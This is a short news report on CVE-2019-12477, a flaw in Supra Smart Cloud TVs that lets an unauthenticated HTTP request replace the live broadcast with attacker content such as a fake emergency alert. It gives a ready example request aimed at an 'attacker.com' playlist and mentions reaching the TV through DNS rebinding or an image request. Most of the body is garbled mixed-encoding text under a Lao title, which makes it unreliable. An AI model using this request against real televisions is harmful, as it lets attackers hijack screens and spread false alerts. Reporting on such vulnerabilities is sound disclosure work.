เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปƒเบ™เป‚เบ—เบฅเบฐเบžเบฒเบšเบญเบฑเบ”เบชเบฐเบฅเบดเบเบฐ Supra เบ—เบตเปˆเบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบ—เปˆเบฒเบ™เบชเบฐเปเบ”เบ‡เบงเบดเบ”เบตเป‚เบญเบ›เบญเบก

ะ’ ั‚ะตะปะตะฒะธะทะพั€ะฐั… Supra Smart Cloud TV เบเปเบฒเบ™เบปเบ” ัƒัะทะฒะธะผะพัั‚ัŒ (CVE-2019-12477), ะฟะพะทะฒะพะปััŽั‰ะฐั ะฟะพะดะผะตะฝะธั‚ัŒ ะฟั€ะพัะผะฐั‚ั€ะธะฒะฐะตะผัƒัŽ ะฒ ะดะฐะฝะฝั‹ะน ะผะพะผะตะฝั‚ ะฟะตั€ะตะดะฐั‡ัƒ ะฝะฐ ะบะพะฝั‚ะตะฝั‚ ะฐั‚ะฐะบัƒัŽั‰ะตะณะพ. ะ’ ะบะฐั‡ะตัั‚ะฒะต ะฟั€ะธะผะตั€ะฐ ะฟั€ะพะดะตะผะพะฝัั‚ั€ะธั€ะพะฒะฐะฝ ะฒั‹ะฒะพะด ั„ะธะบั‚ะธะฒะฝะพะณะพ ะฟั€ะตะดัƒะฟั€ะตะถะดะตะฝะธั ะพ ะฒะพะทะฝะธะบะฝะพะฒะตะฝะธะธ ั‡ั€ะตะทะฒั‹ั‡ะฐะนะฝะพะน ัะธั‚ัƒะฐั†ะธะธ.


ะ”ะปั ะฐั‚ะฐะบะธ ะดะพัั‚ะฐั‚ะพั‡ะฝะพ ะพั‚ะฟั€ะฐะฒะธั‚ัŒ ัะฟะตั†ะธะฐะปัŒะฝะพ ะพั„ะพั€ะผะปะตะฝะฝั‹ะน ัะตั‚ะตะฒะพะน ะทะฐะฟั€ะพั, ะฝะต ั‚ั€ะตะฑัƒัŽั‰ะธะน ะฐัƒั‚ะตะฝั‚ะธั„ะธะบะฐั†ะธะธ. ะ’ ั‡ะฐัั‚ะฝะพัั‚ะธ, ะผะพะถะฝะพ ะพะฑั€ะฐั‚ะธั‚ัŒัั ะบ ะพะฑั€ะฐะฑะพั‚ั‡ะธะบัƒ ยซ/remote/media_control?action=setUri&uri=ยป ัƒะบะฐะทะฐะฒ URL m3u8-ั„ะฐะนะปะฐ ั ะฟะฐั€ะฐะผะตั‚ั€ะฐะผะธ ะฒะธะดะตะพ, ะฝะฐะฟั€ะธะผะตั€ ยซhttp://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8ยป.

ะ’ ะฑะพะปัŒัˆะธะฝัั‚ะฒะต ัะปัƒั‡ะฐะตะฒ ะดะพัั‚ัƒะฟ ะบ IP-ะฐะดั€ะตััƒ ั‚ะตะปะตะฒะธะทะพั€ะฐ ะพะณั€ะฐะฝะธั‡ะตะฝ ะฒะฝัƒั‚ั€ะตะฝะฝะตะน ัะตั‚ัŒัŽ, ะฝะพ ั‚ะฐะบ ะบะฐะบ ะทะฐะฟั€ะพั ะพั‚ะฟั€ะฐะฒะปัะตั‚ัั ั‡ะตั€ะตะท HTTP ะฒะพะทะผะพะถะฝะพ ะฟั€ะธะผะตะฝะตะฝะธะต ะผะตั‚ะพะดะพะฒ ะดะปั ะพะฑั€ะฐั‰ะตะฝะธั ะบ ะฒะฝัƒั‚ั€ะตะฝะฝะธะผ ั€ะตััƒั€ัะฐะผ ะฟั€ะธ ะพั‚ะบั€ั‹ั‚ะธะธ ะฟะพะปัŒะทะพะฒะฐั‚ะตะปะตะผ ัะฟะตั†ะธะฐะปัŒะฝะพ ะพั„ะพั€ะผะปะตะฝะฝะพะน ะฒะฝะตัˆะฝะตะน ัั‚ั€ะฐะฝะธั†ั‹ (ะฝะฐะฟั€ะธะผะตั€, ะฟะพะด ะฒะธะดะพะผ ะทะฐะฟั€ะพัะฐ ะบะฐั€ั‚ะธะฝะบะธ ะธะปะธ ะธัะฟะพะปัŒะทัƒั ะผะตั‚ะพะด DNS Rebinding).

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: opennet.ru

เป€เบžเบตเปˆเบกเบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™